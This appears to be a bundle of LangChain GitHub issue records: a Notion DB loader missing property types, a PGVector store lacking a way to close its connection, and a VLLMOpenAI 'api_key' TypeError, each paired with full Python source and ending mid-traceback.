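Following up on the suggestion in the Pinecone record above: a minimal sketch of the proposed override, keeping Pinecone's native cosine similarity as the relevance score instead of letting the base class convert it to a distance. The subclass name is hypothetical; `Pinecone` and `_cosine_relevance_score_fn` are the class and method referenced in the issue.

```python
from langchain.vectorstores.pinecone import Pinecone


class PineconeCosineSimilarity(Pinecone):  # hypothetical name, illustration only
    """Sketch: pass Pinecone's cosine similarity through unchanged."""

    @staticmethod
    def _cosine_relevance_score_fn(score: float) -> float:
        # The base VectorStore treats the score as a distance and returns
        # 1.0 - score; Pinecone already returns a similarity, so keep it.
        return score
```

With this override, `similarity_search_with_relevance_scores` combined with a `score_threshold` keeps the most relevant documents rather than discarding them.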
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,356
Issue: Notion DB loader doesn't support some properties
### Issue you'd like to raise. Notion page properties: https://developers.notion.com/reference/page-property-values The current version of the Notion DB loader doesn't support the following properties for metadata: - `checkbox` - `email` - `number` - `select` (a sketch of the missing branches follows this record's file content below) ### Suggestion: I would like to make a PR to fix this issue if that's okay.
https://github.com/langchain-ai/langchain/issues/13356
https://github.com/langchain-ai/langchain/pull/13358
c9b9359647f1f1b24f106b93f180509db7932950
3b5e8bacfa6d5b7c223cb93f09c6c21d39542b43
"2023-11-14T17:20:22Z"
python
"2023-11-15T04:31:12Z"
libs/langchain/langchain/document_loaders/notiondb.py
from typing import Any, Dict, List, Optional import requests from langchain.docstore.document import Document from langchain.document_loaders.base import BaseLoader NOTION_BASE_URL = "https://api.notion.com/v1" DATABASE_URL = NOTION_BASE_URL + "/databases/{database_id}/query" PAGE_URL = NOTION_BASE_URL + "/pages/{page_id}" BLOCK_URL = NOTION_BASE_URL + "/blocks/{block_id}/children" class NotionDBLoader(BaseLoader): """Load from `Notion DB`. Reads content from pages within a Notion Database. Args: integration_token (str): Notion integration token. database_id (str): Notion database id. request_timeout_sec (int): Timeout for Notion requests in seconds. Defaults to 10. """ def __init__( self, integration_token: str, database_id: str, request_timeout_sec: Optional[int] = 10, ) -> None: """Initialize with parameters.""" if not integration_token: raise ValueError("integration_token must be provided") if not database_id: raise ValueError("database_id must be provided") self.token = integration_token self.database_id = database_id self.headers = { "Authorization": "Bearer " + self.token, "Content-Type": "application/json", "Notion-Version": "2022-06-28", } self.request_timeout_sec = request_timeout_sec def load(self) -> List[Document]: """Load documents from the Notion database. Returns: List[Document]: List of documents. """ page_summaries = self._retrieve_page_summaries() return list(self.load_page(page_summary) for page_summary in page_summaries) def _retrieve_page_summaries( self, query_dict: Dict[str, Any] = {"page_size": 100} ) -> List[Dict[str, Any]]: """Get all the pages from a Notion database.""" pages: List[Dict[str, Any]] = [] while True: data = self._request( DATABASE_URL.format(database_id=self.database_id), method="POST", query_dict=query_dict, ) pages.extend(data.get("results")) if not data.get("has_more"): break query_dict["start_cursor"] = data.get("next_cursor") return pages def load_page(self, page_summary: Dict[str, Any]) -> Document: """Read a page. Args: page_summary: Page summary from Notion API. 
""" page_id = page_summary["id"] # load properties as metadata metadata: Dict[str, Any] = {} for prop_name, prop_data in page_summary["properties"].items(): prop_type = prop_data["type"] if prop_type == "rich_text": value = ( prop_data["rich_text"][0]["plain_text"] if prop_data["rich_text"] else None ) elif prop_type == "title": value = ( prop_data["title"][0]["plain_text"] if prop_data["title"] else None ) elif prop_type == "multi_select": value = ( [item["name"] for item in prop_data["multi_select"]] if prop_data["multi_select"] else [] ) elif prop_type == "url": value = prop_data["url"] elif prop_type == "unique_id": value = ( f'{prop_data["unique_id"]["prefix"]}-{prop_data["unique_id"]["number"]}' if prop_data["unique_id"] else None ) elif prop_type == "status": value = prop_data["status"]["name"] if prop_data["status"] else None elif prop_type == "people": value = ( [item["name"] for item in prop_data["people"]] if prop_data["people"] else [] ) elif prop_type == "date": value = prop_data["date"] if prop_data["date"] else None elif prop_type == "last_edited_time": value = ( prop_data["last_edited_time"] if prop_data["last_edited_time"] else None ) elif prop_type == "created_time": value = prop_data["created_time"] if prop_data["created_time"] else None else: value = None metadata[prop_name.lower()] = value metadata["id"] = page_id return Document(page_content=self._load_blocks(page_id), metadata=metadata) def _load_blocks(self, block_id: str, num_tabs: int = 0) -> str: """Read a block and its children.""" result_lines_arr: List[str] = [] cur_block_id: str = block_id while cur_block_id: data = self._request(BLOCK_URL.format(block_id=cur_block_id)) for result in data["results"]: result_obj = result[result["type"]] if "rich_text" not in result_obj: continue cur_result_text_arr: List[str] = [] for rich_text in result_obj["rich_text"]: if "text" in rich_text: cur_result_text_arr.append( "\t" * num_tabs + rich_text["text"]["content"] ) if result["has_children"]: children_text = self._load_blocks( result["id"], num_tabs=num_tabs + 1 ) cur_result_text_arr.append(children_text) result_lines_arr.append("\n".join(cur_result_text_arr)) cur_block_id = data.get("next_cursor") return "\n".join(result_lines_arr) def _request( self, url: str, method: str = "GET", query_dict: Dict[str, Any] = {} ) -> Any: res = requests.request( method, url, headers=self.headers, json=query_dict, timeout=self.request_timeout_sec, ) res.raise_for_status() return res.json()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,696
No way to close an open connection in PGVector.py
### Feature request Initialization with database connection: when an instance of the PGVector class is created, it automatically establishes a connection with the PostgreSQL vector database. Method for closing the connection: we need to implement a method within the PGVector class that allows you to close the established connection with the PostgreSQL database, e.g. `def __del__(self): # Close the session (and thus the connection) when the instance is destroyed. self.session.close()` (a fuller sketch follows this record's file content below). ### Motivation The problem is that I am unable to close a connection, so the pool gets overloaded with multiple connections and the service starts throwing errors. ### Your contribution I guess, maybe.
https://github.com/langchain-ai/langchain/issues/9696
https://github.com/langchain-ai/langchain/pull/13232
85a77d2c2795b8f0463d809e459c68d4277bd080
1726d5dcdd495fa204c2907ce826df81527e0f14
"2023-08-24T11:57:09Z"
python
"2023-11-15T20:34:37Z"
libs/langchain/langchain/vectorstores/pgvector.py
from __future__ import annotations import asyncio import contextlib import enum import logging import uuid from functools import partial from typing import ( TYPE_CHECKING, Any, Callable, Dict, Generator, Iterable, List, Optional, Tuple, Type, ) import numpy as np import sqlalchemy from sqlalchemy import delete from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.orm import Session try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore from langchain.utils import get_from_dict_or_env from langchain.vectorstores.utils import maximal_marginal_relevance if TYPE_CHECKING: from langchain.vectorstores._pgvector_data_models import CollectionStore class DistanceStrategy(str, enum.Enum): """Enumerator of the Distance strategies.""" EUCLIDEAN = "l2" COSINE = "cosine" MAX_INNER_PRODUCT = "inner" DEFAULT_DISTANCE_STRATEGY = DistanceStrategy.COSINE Base = declarative_base() # type: Any _LANGCHAIN_DEFAULT_COLLECTION_NAME = "langchain" class BaseModel(Base): """Base model for the SQL stores.""" __abstract__ = True uuid = sqlalchemy.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) def _results_to_docs(docs_and_scores: Any) -> List[Document]: """Return docs from docs and scores.""" return [doc for doc, _ in docs_and_scores] class PGVector(VectorStore): """`Postgres`/`PGVector` vector store. To use, you should have the ``pgvector`` python package installed. Args: connection_string: Postgres connection string. embedding_function: Any embedding function implementing `langchain.embeddings.base.Embeddings` interface. collection_name: The name of the collection to use. (default: langchain) NOTE: This is not the name of the table, but the name of the collection. The tables will be created when initializing the store (if not exists) So, make sure the user has the right permissions to create tables. distance_strategy: The distance strategy to use. (default: COSINE) pre_delete_collection: If True, will delete the collection if it exists. (default: False). Useful for testing. engine_args: SQLAlchemy's create engine arguments. Example: .. 
code-block:: python from langchain.vectorstores import PGVector from langchain.embeddings.openai import OpenAIEmbeddings CONNECTION_STRING = "postgresql+psycopg2://hwc@localhost:5432/test3" COLLECTION_NAME = "state_of_the_union_test" embeddings = OpenAIEmbeddings() vectorestore = PGVector.from_documents( embedding=embeddings, documents=docs, collection_name=COLLECTION_NAME, connection_string=CONNECTION_STRING, ) """ def __init__( self, connection_string: str, embedding_function: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, collection_metadata: Optional[dict] = None, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, pre_delete_collection: bool = False, logger: Optional[logging.Logger] = None, relevance_score_fn: Optional[Callable[[float], float]] = None, *, connection: Optional[sqlalchemy.engine.Connection] = None, engine_args: Optional[dict[str, Any]] = None, ) -> None: self.connection_string = connection_string self.embedding_function = embedding_function self.collection_name = collection_name self.collection_metadata = collection_metadata self._distance_strategy = distance_strategy self.pre_delete_collection = pre_delete_collection self.logger = logger or logging.getLogger(__name__) self.override_relevance_score_fn = relevance_score_fn self.engine_args = engine_args or {} # Create a connection if not provided, otherwise use the provided connection self._conn = connection if connection else self.connect() self.__post_init__() def __post_init__( self, ) -> None: """Initialize the store.""" self.create_vector_extension() from langchain.vectorstores._pgvector_data_models import ( CollectionStore, EmbeddingStore, ) self.CollectionStore = CollectionStore self.EmbeddingStore = EmbeddingStore self.create_tables_if_not_exists() self.create_collection() @property def embeddings(self) -> Embeddings: return self.embedding_function def connect(self) -> sqlalchemy.engine.Connection: engine = sqlalchemy.create_engine(self.connection_string, **self.engine_args) conn = engine.connect() return conn def create_vector_extension(self) -> None: try: with Session(self._conn) as session: # The advisor lock fixes issue arising from concurrent # creation of the vector extension. 
# https://github.com/langchain-ai/langchain/issues/12933 # For more information see: # https://www.postgresql.org/docs/16/explicit-locking.html#ADVISORY-LOCKS statement = sqlalchemy.text( "BEGIN;" "SELECT pg_advisory_xact_lock(1573678846307946496);" "CREATE EXTENSION IF NOT EXISTS vector;" "COMMIT;" ) session.execute(statement) session.commit() except Exception as e: raise Exception(f"Failed to create vector extension: {e}") from e def create_tables_if_not_exists(self) -> None: with self._conn.begin(): Base.metadata.create_all(self._conn) def drop_tables(self) -> None: with self._conn.begin(): Base.metadata.drop_all(self._conn) def create_collection(self) -> None: if self.pre_delete_collection: self.delete_collection() with Session(self._conn) as session: self.CollectionStore.get_or_create( session, self.collection_name, cmetadata=self.collection_metadata ) def delete_collection(self) -> None: self.logger.debug("Trying to delete collection") with Session(self._conn) as session: collection = self.get_collection(session) if not collection: self.logger.warning("Collection not found") return session.delete(collection) session.commit() @contextlib.contextmanager def _make_session(self) -> Generator[Session, None, None]: """Create a context manager for the session, bind to _conn string.""" yield Session(self._conn) def delete( self, ids: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Delete vectors by ids or uuids. Args: ids: List of ids to delete. """ with Session(self._conn) as session: if ids is not None: self.logger.debug( "Trying to delete vectors by ids (represented by the model " "using the custom ids field)" ) stmt = delete(self.EmbeddingStore).where( self.EmbeddingStore.custom_id.in_(ids) ) session.execute(stmt) session.commit() def get_collection(self, session: Session) -> Optional["CollectionStore"]: return self.CollectionStore.get_by_name(session, self.collection_name) @classmethod def __from( cls, texts: List[str], embeddings: List[List[float]], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, connection_string: Optional[str] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: if ids is None: ids = [str(uuid.uuid1()) for _ in texts] if not metadatas: metadatas = [{} for _ in texts] if connection_string is None: connection_string = cls.get_connection_string(kwargs) store = cls( connection_string=connection_string, collection_name=collection_name, embedding_function=embedding, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) store.add_embeddings( texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs ) return store def add_embeddings( self, texts: Iterable[str], embeddings: List[List[float]], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, **kwargs: Any, ) -> List[str]: """Add embeddings to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. embeddings: List of list of embedding vectors. metadatas: List of metadatas associated with the texts. 
kwargs: vectorstore specific parameters """ if ids is None: ids = [str(uuid.uuid1()) for _ in texts] if not metadatas: metadatas = [{} for _ in texts] with Session(self._conn) as session: collection = self.get_collection(session) if not collection: raise ValueError("Collection not found") for text, metadata, embedding, id in zip(texts, metadatas, embeddings, ids): embedding_store = self.EmbeddingStore( embedding=embedding, document=text, cmetadata=metadata, custom_id=id, collection_id=collection.uuid, ) session.add(embedding_store) session.commit() return ids def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. kwargs: vectorstore specific parameters Returns: List of ids from adding the texts into the vectorstore. """ embeddings = self.embedding_function.embed_documents(list(texts)) return self.add_embeddings( texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs ) def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search with PGVector with distance. Args: query (str): Query text to search for. k (int): Number of results to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query. """ embedding = self.embedding_function.embed_query(text=query) return self.similarity_search_by_vector( embedding=embedding, k=k, filter=filter, ) def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, ) -> List[Tuple[Document, float]]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query and score for each. """ embedding = self.embedding_function.embed_query(query) docs = self.similarity_search_with_score_by_vector( embedding=embedding, k=k, filter=filter ) return docs @property def distance_strategy(self) -> Any: if self._distance_strategy == DistanceStrategy.EUCLIDEAN: return self.EmbeddingStore.embedding.l2_distance elif self._distance_strategy == DistanceStrategy.COSINE: return self.EmbeddingStore.embedding.cosine_distance elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self.EmbeddingStore.embedding.max_inner_product else: raise ValueError( f"Got unexpected value for distance: {self._distance_strategy}. " f"Should be one of {', '.join([ds.value for ds in DistanceStrategy])}." 
) def similarity_search_with_score_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[dict] = None, ) -> List[Tuple[Document, float]]: results = self.__query_collection(embedding=embedding, k=k, filter=filter) return self._results_to_docs_and_scores(results) def _results_to_docs_and_scores(self, results: Any) -> List[Tuple[Document, float]]: """Return docs and scores from results.""" docs = [ ( Document( page_content=result.EmbeddingStore.document, metadata=result.EmbeddingStore.cmetadata, ), result.distance if self.embedding_function is not None else None, ) for result in results ] return docs def __query_collection( self, embedding: List[float], k: int = 4, filter: Optional[Dict[str, str]] = None, ) -> List[Any]: """Query the collection.""" with Session(self._conn) as session: collection = self.get_collection(session) if not collection: raise ValueError("Collection not found") filter_by = self.EmbeddingStore.collection_id == collection.uuid if filter is not None: filter_clauses = [] for key, value in filter.items(): IN = "in" if isinstance(value, dict) and IN in map(str.lower, value): value_case_insensitive = { k.lower(): v for k, v in value.items() } filter_by_metadata = self.EmbeddingStore.cmetadata[ key ].astext.in_(value_case_insensitive[IN]) filter_clauses.append(filter_by_metadata) else: filter_by_metadata = self.EmbeddingStore.cmetadata[ key ].astext == str(value) filter_clauses.append(filter_by_metadata) filter_by = sqlalchemy.and_(filter_by, *filter_clauses) _type = self.EmbeddingStore results: List[Any] = ( session.query( self.EmbeddingStore, self.distance_strategy(embedding).label("distance"), # type: ignore ) .filter(filter_by) .order_by(sqlalchemy.asc("distance")) .join( self.CollectionStore, self.EmbeddingStore.collection_id == self.CollectionStore.uuid, ) .limit(k) .all() ) return results def similarity_search_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Document]: """Return docs most similar to embedding vector. Args: embedding: Embedding to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query vector. """ docs_and_scores = self.similarity_search_with_score_by_vector( embedding=embedding, k=k, filter=filter ) return _results_to_docs(docs_and_scores) @classmethod def from_texts( cls: Type[PGVector], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Return VectorStore initialized from texts and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. 
""" embeddings = embedding.embed_documents(list(texts)) return cls.__from( texts, embeddings, embedding, metadatas=metadatas, ids=ids, collection_name=collection_name, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) @classmethod def from_embeddings( cls, text_embeddings: List[Tuple[str, List[float]]], embedding: Embeddings, metadatas: Optional[List[dict]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """Construct PGVector wrapper from raw documents and pre- generated embeddings. Return VectorStore initialized from documents and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. Example: .. code-block:: python from langchain.vectorstores import PGVector from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() text_embeddings = embeddings.embed_documents(texts) text_embedding_pairs = list(zip(texts, text_embeddings)) faiss = PGVector.from_embeddings(text_embedding_pairs, embeddings) """ texts = [t[0] for t in text_embeddings] embeddings = [t[1] for t in text_embeddings] return cls.__from( texts, embeddings, embedding, metadatas=metadatas, ids=ids, collection_name=collection_name, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) @classmethod def from_existing_index( cls: Type[PGVector], embedding: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Get instance of an existing PGVector store.This method will return the instance of the store without inserting any new embeddings """ connection_string = cls.get_connection_string(kwargs) store = cls( connection_string=connection_string, collection_name=collection_name, embedding_function=embedding, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, ) return store @classmethod def get_connection_string(cls, kwargs: Dict[str, Any]) -> str: connection_string: str = get_from_dict_or_env( data=kwargs, key="connection_string", env_key="PGVECTOR_CONNECTION_STRING", ) if not connection_string: raise ValueError( "Postgres connection string is required" "Either pass it as a parameter" "or set the PGVECTOR_CONNECTION_STRING environment variable." ) return connection_string @classmethod def from_documents( cls: Type[PGVector], documents: List[Document], embedding: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Return VectorStore initialized from documents and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. 
""" texts = [d.page_content for d in documents] metadatas = [d.metadata for d in documents] connection_string = cls.get_connection_string(kwargs) kwargs["connection_string"] = connection_string return cls.from_texts( texts=texts, pre_delete_collection=pre_delete_collection, embedding=embedding, distance_strategy=distance_strategy, metadatas=metadatas, ids=ids, collection_name=collection_name, **kwargs, ) @classmethod def connection_string_from_db_params( cls, driver: str, host: str, port: int, database: str, user: str, password: str, ) -> str: """Return connection string from database parameters.""" return f"postgresql+{driver}://{user}:{password}@{host}:{port}/{database}" def _select_relevance_score_fn(self) -> Callable[[float], float]: """ The 'correct' relevance function may differ depending on a few things, including: - the distance / similarity metric used by the VectorStore - the scale of your embeddings (OpenAI's are unit normed. Many others are not!) - embedding dimensionality - etc. """ if self.override_relevance_score_fn is not None: return self.override_relevance_score_fn # Default strategy is to rely on distance strategy provided # in vectorstore constructor if self._distance_strategy == DistanceStrategy.COSINE: return self._cosine_relevance_score_fn elif self._distance_strategy == DistanceStrategy.EUCLIDEAN: return self._euclidean_relevance_score_fn elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self._max_inner_product_relevance_score_fn else: raise ValueError( "No supported normalization function" f" for distance_strategy of {self._distance_strategy}." "Consider providing relevance_score_fn to PGVector constructor." ) def max_marginal_relevance_search_with_score_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs selected using the maximal marginal relevance with score to embedding vector. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding: Embedding to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Tuple[Document, float]]: List of Documents selected by maximal marginal relevance to the query and score for each. """ results = self.__query_collection(embedding=embedding, k=fetch_k, filter=filter) embedding_list = [result.EmbeddingStore.embedding for result in results] mmr_selected = maximal_marginal_relevance( np.array(embedding, dtype=np.float32), embedding_list, k=k, lambda_mult=lambda_mult, ) candidates = self._results_to_docs_and_scores(results) return [r for i, r in enumerate(candidates) if i in mmr_selected] def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. 
k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Document]: List of Documents selected by maximal marginal relevance. """ embedding = self.embedding_function.embed_query(query) return self.max_marginal_relevance_search_by_vector( embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) def max_marginal_relevance_search_with_score( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs selected using the maximal marginal relevance with score. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Tuple[Document, float]]: List of Documents selected by maximal marginal relevance to the query and score for each. """ embedding = self.embedding_function.embed_query(query) docs = self.max_marginal_relevance_search_with_score_by_vector( embedding=embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return docs def max_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance to embedding vector. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Document]: List of Documents selected by maximal marginal relevance. """ docs_and_scores = self.max_marginal_relevance_search_with_score_by_vector( embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return _results_to_docs(docs_and_scores) async def amax_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance.""" # This is a temporary workaround to make the similarity search # asynchronous. The proper solution is to make the similarity search # asynchronous in the vector store implementations. 
func = partial( self.max_marginal_relevance_search_by_vector, embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return await asyncio.get_event_loop().run_in_executor(None, func)
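Picking up the PGVector record above: the store creates its SQLAlchemy connection in `connect()` and stores it as `self._conn`, but never exposes a way to release it. A minimal sketch of an explicit close method under that assumption; the subclass name is hypothetical and this is not the merged fix.

```python
from langchain.vectorstores.pgvector import PGVector


class ClosablePGVector(PGVector):  # hypothetical name, illustration only
    def close(self) -> None:
        """Release the SQLAlchemy connection created in connect()."""
        if self._conn is not None:
            self._conn.close()

    def __del__(self) -> None:
        # Best-effort cleanup on garbage collection, as the issue's snippet
        # suggests; calling close() explicitly remains the safer pattern.
        try:
            self.close()
        except Exception:
            pass
```

Closing the connection returns it to the engine's pool, which addresses the pool-exhaustion symptom described in the motivation.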
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,507
VLLMOpenAI -- create() got an unexpected keyword argument 'api_key'
### System Info Python 3.9 langchain 0.0.336 openai 1.3.2 pandas 2.1.3 ### Who can help? @EYU ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction First of all, thank you for this great library ! Concerning the bug, I have a vllm openai server (0.2.1.post1) running locally started with the following command: ``` python -m vllm.entrypoints.openai.api_server --model ./zephyr-7b-beta --served-model-name zephyr-7b-beta ``` On the client side, I have this piece of code, slightly adapted from the documentation (only the model name changes). ```python from langchain.llms import VLLMOpenAI llm = VLLMOpenAI( openai_api_key="EMPTY", openai_api_base="http://localhost:8000/v1", model_name="zephyr-7b-beta", ) print(llm("Rome is")) ``` And I got the following error: ```text --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Cell In[19], line 6 1 llm = VLLMOpenAI( 2 openai_api_key="EMPTY", 3 openai_api_base="http://localhost:8000/v1", 4 model_name="zephyr-7b-beta", 5 ) ----> 6 llm("Rome is") File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:876, in BaseLLM.__call__(self, prompt, stop, callbacks, tags, metadata, **kwargs) 869 if not isinstance(prompt, str): 870 raise ValueError( 871 "Argument `prompt` is expected to be a string. Instead found " 872 f"{type(prompt)}. If you want to run the LLM on multiple prompts, use " 873 "`generate` instead." 874 ) 875 return ( --> 876 self.generate( 877 [prompt], 878 stop=stop, 879 callbacks=callbacks, 880 tags=tags, 881 metadata=metadata, 882 **kwargs, 883 ) 884 .generations[0][0] 885 .text 886 ) File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:656, in BaseLLM.generate(self, prompts, stop, callbacks, tags, metadata, run_name, **kwargs) 641 raise ValueError( 642 "Asked to cache, but no cache found at `langchain.cache`." 643 ) 644 run_managers = [ 645 callback_manager.on_llm_start( 646 dumpd(self), (...) 654 ) 655 ] --> 656 output = self._generate_helper( 657 prompts, stop, run_managers, bool(new_arg_supported), **kwargs 658 ) 659 return output 660 if len(missing_prompts) > 0: File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:544, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 542 for run_manager in run_managers: 543 run_manager.on_llm_error(e) --> 544 raise e 545 flattened_outputs = output.flatten() 546 for manager, flattened_output in zip(run_managers, flattened_outputs): File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:531, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 521 def _generate_helper( 522 self, 523 prompts: List[str], (...) 
527 **kwargs: Any, 528 ) -> LLMResult: 529 try: 530 output = ( --> 531 self._generate( 532 prompts, 533 stop=stop, 534 # TODO: support multiple run managers 535 run_manager=run_managers[0] if run_managers else None, 536 **kwargs, 537 ) 538 if new_arg_supported 539 else self._generate(prompts, stop=stop) 540 ) 541 except BaseException as e: 542 for run_manager in run_managers: File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:454, in BaseOpenAI._generate(self, prompts, stop, run_manager, **kwargs) 442 choices.append( 443 { 444 "text": generation.text, (...) 451 } 452 ) 453 else: --> 454 response = completion_with_retry( 455 self, prompt=_prompts, run_manager=run_manager, **params 456 ) 457 if not isinstance(response, dict): 458 # V1 client returns the response in an PyDantic object instead of 459 # dict. For the transition period, we deep convert it to dict. 460 response = response.dict() File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:114, in completion_with_retry(llm, run_manager, **kwargs) 112 """Use tenacity to retry the completion call.""" 113 if is_openai_v1(): --> 114 return llm.client.create(**kwargs) 116 retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) 118 @retry_decorator 119 def _completion_with_retry(**kwargs: Any) -> Any: File 